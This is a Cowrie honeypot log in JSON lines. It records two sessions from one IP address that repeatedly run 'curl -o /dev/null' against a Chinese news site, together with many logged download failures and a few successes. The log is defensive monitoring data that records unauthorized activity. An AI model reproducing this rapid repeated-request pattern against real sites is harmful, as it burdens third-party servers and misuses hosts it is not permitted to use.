{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.536188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.537225Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.541140Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.542265Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.577249Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.578340Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.579985Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.585545Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.586465Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.625438Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.626972Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.669842Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.671558Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.724461Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.752329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.753369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.758430Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.759351Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.780441Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.781587Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.797604Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.798381Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.846854Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.848174Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.885338Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.886396Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.889251Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.905535Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.906549Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.921851Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.923218Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.939921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.940854Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.957418Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.958717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.961538Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:32.990849Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.991825Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:32.994435Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.008671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.009866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.012745Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.036985Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.040467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.041320Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.058221Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.059231Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.060858Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.083928Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.104126Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.112608Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.113286Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.126541Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.127427Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.145467Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.167908Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.197069Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.198218Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.201444Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.205650Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.206499Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.215655Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.248761Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.256242Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.263128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.264175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.266589Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.268234Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.270205Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.305089Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.307257Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.320977Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.321978Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.354800Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.356614Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.383047Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.384401Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.404086Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.407014Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.457705Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.477311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.478719Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.500453Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.528464Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.529890Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.540329Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.542342Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.566953Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.567978Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.585459Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.587128Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.606480Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.607796Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.624591Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.626575Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.629511Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.630468Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.644750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.645602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.667454Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.668456Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.727361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.728373Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.747396Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.748550Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.751539Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.752671Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.792973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.794348Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.796127Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.842528Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.843959Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.868944Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.870289Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.900195Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.901679Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.919669Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.921885Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.941971Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.943358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.954058Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.956247Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
